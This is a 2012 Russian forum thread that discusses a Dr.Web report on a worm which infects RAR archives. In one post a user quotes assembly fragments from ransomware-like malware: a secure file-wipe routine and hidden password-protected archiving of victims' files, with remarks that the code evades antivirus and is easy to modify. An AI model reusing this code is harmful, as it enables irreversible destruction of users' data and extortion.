Сейчас на форуме: user99 (+2 невидимых)

 eXeL@B —› Оффтоп —› Обнаружен новый червь, заражающий RAR-архивы
Посл.ответ Сообщение

Ранг: 38.4 (посетитель), 16thx
Активность: 0.050
Статус: Участник

 Создано: 17 мая 2012 17:17
· Личное сообщение · #1

Компания «Доктор Веб» сообщила о распространении вредоносной программы-червя Win32.HLLW.Autoruner.64548, способной заражать RAR-архивы. Червь «умеет» загружать с удаленного сервера злоумышленников исполняемые файлы, которые могут нести вредоносный функционал.

Вредоносная программа Win32.HLLW.Autoruner.64548 распространяется так же, как и многие другие черви: создает свою копию на диске и размещает в корневой папке файл autorun.inf, запускающий червя при подключении устройства. Начав свою работу на инфицированном компьютере, Win32.HLLW.Autoruner.64548 ищет на дисках RAR-архивы и записывает себя в них, используя одно из следующих имен: secret.exe, AVIRA_License.exe, Warcraft_money.exe, CS16.exe, Update.exe, private.exe, Autoruns.exe, Tutorial.exe, Autorun.exe, Readme.exe, Real.exe, readme.exe, Keygen.exe, Avast_keygen.exe. В некоторых случаях после подобной модификации архивы повреждаются.

Кроме того, червь имеет модуль полезной нагрузки. Также в его теле содержится исполняемый файл, который Win32.HLLW.Autoruner.64548 сохраняет в папку установки Windows в виде библиотеки mssys.dll. Ссылку на эту библиотеку вредоносная программа записывает в системный реестр. Полезную нагрузку червь встраивает в копию собственного процесса. Затем вредоносная программа соединяется с удаленным сервером злоумышленников и ожидает команд на загрузку и запуск исполняемых файлов.

Win32.HLLW.Autoruner.64548 — представитель достаточно редкой категории вредоносных программ, способных заражать RAR-архивы. При распаковке RAR-архивов обращайте внимание, не появились ли внутри подозрительные исполняемые файлы: их случайный запуск может нанести вред вашему компьютеру


Источник: news.drweb.com



Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

 Создано: 17 мая 2012 18:51
· Личное сообщение · #2

Что-то я видел уже где-то такое года два назад.



Ранг: 49.8 (посетитель), 56thx
Активность: 0.090
Статус: Участник

 Создано: 18 мая 2012 00:01
· Личное сообщение · #3

Да это уже старая тема. Более адский код содержит в себе MOAR, который находит рар и им паролит все файлы..
Причем предварительно их вайпит, после чего большинство программ для восстановления идут лесом.
Код вайпа:
Code:
  1. WipeFile proc
  2.    LOCAL h       :DWORD
  3.    LOCAL nw      :DWORD
  4.    LOCAL dmod    :DWORD
  5.    LOCAL towrite :DWORD
  6.       invoke  CreateFile, addr FilePathBuf, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL
  7.       cmp     eax, -1
  8.       jne     @F
  9.               ret
  10.       @@:
  11.       mov     h, eax
  12.       invoke  SetFilePointer, h, 0, NULL, FILE_BEGIN
  13.       invoke  GetFileSize, h, NULL
  14.       cmp     eax, BUFFER_SIZE
  15.       jge     @F
  16.               mov ecx, 1
  17.               mov dword ptr [towrite], eax
  18.               mov dword ptr [dmod], 0
  19.               jmp loop_wipe
  20.       @@:
  21.               xor edx, edx
  22.               mov ebx, BUFFER_SIZE
  23.               div ebx
  24.               mov ecx, eax
  25.               mov dword ptr [towrite], BUFFER_SIZE
  26.               mov dword ptr [dmod], edx
  27.       loop_wipe:
  28.       push    ecx
  29.       invoke  WriteFile, h, [hmem], [towrite], addr nw, NULL
  30.       pop     ecx
  31.       loop    loop_wipe
  32.       mov     eax, dword ptr [dmod]
  33.       test    eax, eax
  34.       je      bez_ostatka
  35.       invoke  WriteFile, h, [hmem], [dmod], addr nw, NULL
  36.       bez_ostatka:
  37.       invoke  SetFilePointer, h, 0, NULL, FILE_BEGIN
  38.       invoke  SetEndOfFile, h
  39.       invoke  CloseHandle, h
  40.       invoke  DeleteFile, addr FilePathBuf
  41.       ret
  42. WipeFile endp


Генерирует пароль для рара:
Code:
  1. call    PwdGen
  2.       invoke  lstrcpy, addr ArName, addr FilePathBuf
  3.       invoke  PathFindExtension, addr ArName
  4.       invoke  lstrcat, addr ArName, addr VirSign
  5.       mov     al, byte ptr [TypeOfPacker]
  6.       cmp     al, WINRAR_PACK
  7.       jne     @F
  8.               invoke  lstrcat, addr ArName, addr WinrarExt
  9.               invoke  wsprintf, addr TmpBuf, addr WinrarMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
  10.               jmp     done_2
  11.       @@:
  12.               invoke  lstrcat, addr ArName, addr SevenZipExt
  13.               invoke  wsprintf, addr TmpBuf, addr SevenZipMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
  14.       done_2:
  15.       invoke  RtlZeroMemory, addr sei, sizeof sei


Ну и далее:
Code:
  1. ; Заполняем структуру SHELLEXECUTEINFO и запускаем rar.exe с парамтером командной строки,
  2. ; в котором хранится путь к файлу для шифрования, путь к выходящему файлу и параметры упаковки.
  3.       mov     sei.cbSize, sizeof sei
  4.       mov     sei.fMask, SEE_MASK_NOCLOSEPROCESS
  5.       mov     sei.nShow, SW_HIDE
  6.       mov     eax, dword ptr [PackerPathPointer]
  7.       mov     sei.lpFile, eax
  8.       mov     sei.lpParameters, offset TmpBuf
  9.       invoke  ShellExecuteEx, addr sei
  10.       test    eax, eax
  11.       jne     run_good
  12. ; Если запуск апроцеса архивации неудался, выходим.
  13.               ret
  14.       run_good:
  15. ; Ждем завершения паковки.
  16.       invoke  WaitForSingleObject, sei.hProcess, INFINITE
  17.       invoke  CloseHandle, sei.hProcess
  18. ; Стираем файл без возможности воссановления.
  19.       call    WipeFile
  20.       ret
  21. PackFile endp


Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

 Создано: 18 мая 2012 00:35
· Личное сообщение · #4

Да попадался мне подобный, но более хитрый: обнаруживал установленный Winrar, искал архивы, извлекал из них все *.EXE файлы, склеивал со своим телом и запихивал всё обратно в архив.

-----
AutoIt

Ранг: 49.8 (посетитель), 56thx
Активность: 0.090
Статус: Участник

 Создано: 18 мая 2012 12:53 · Поправил: ressa
· Личное сообщение · #5

да вот я думаю, если моар этот подцепить - завайпит все файлы, заархивирует со сложным паролем - а дальше то что делать с этим всем?)
Ведь антивирями спалить его тяжело, код несложный, можно модифицировать и все..
После подобных мыслей все больше хочется свалить на линь и оставить винду только на виртуалке..



Ранг: 369.8 (мудрец), 400thx
Активность: 0.390
Статус: Участник

 Создано: 18 мая 2012 14:22
· Личное сообщение · #6

ressa пишет:
а дальше то что делать с этим всем?)
Восстанавливать из бекапа. Кто не делает бекапы - ССЗБ.

ressa пишет:
После подобных мыслей все больше хочется свалить на линь и оставить винду только на виртуалке..
Линукс уже попса, рутают во всю, ботнеты из линуксовых роутеров делают, вали на Haiku OS, под нее никому нафиг не надо писать вирусы.

-----
PGP key <0x1B6A24550F33E44A>

Ранг: 189.9 (ветеран), 334thx
Активность: 0.30
Статус: Участник

 Создано: 18 мая 2012 18:32
· Личное сообщение · #7

Вообще по идее на линь больше атак чем на винду.




Ранг: 233.1 (наставник), 30thx
Активность: 0.210
Статус: Участник

 Создано: 18 мая 2012 22:20
· Личное сообщение · #8

Блин, куда же нам деваться?
Подумал насчёт Solaris, так она тоже Unix семейства.
Так и быть останусь на винде.

-----
AutoIt

| Сообщение посчитали полезным: ressa
 eXeL@B —› Оффтоп —› Обнаружен новый червь, заражающий RAR-архивы

У вас должно быть 20 пунктов ранга, чтобы оставлять сообщения в этом подфоруме, но у вас только 0

   Для печати Для печати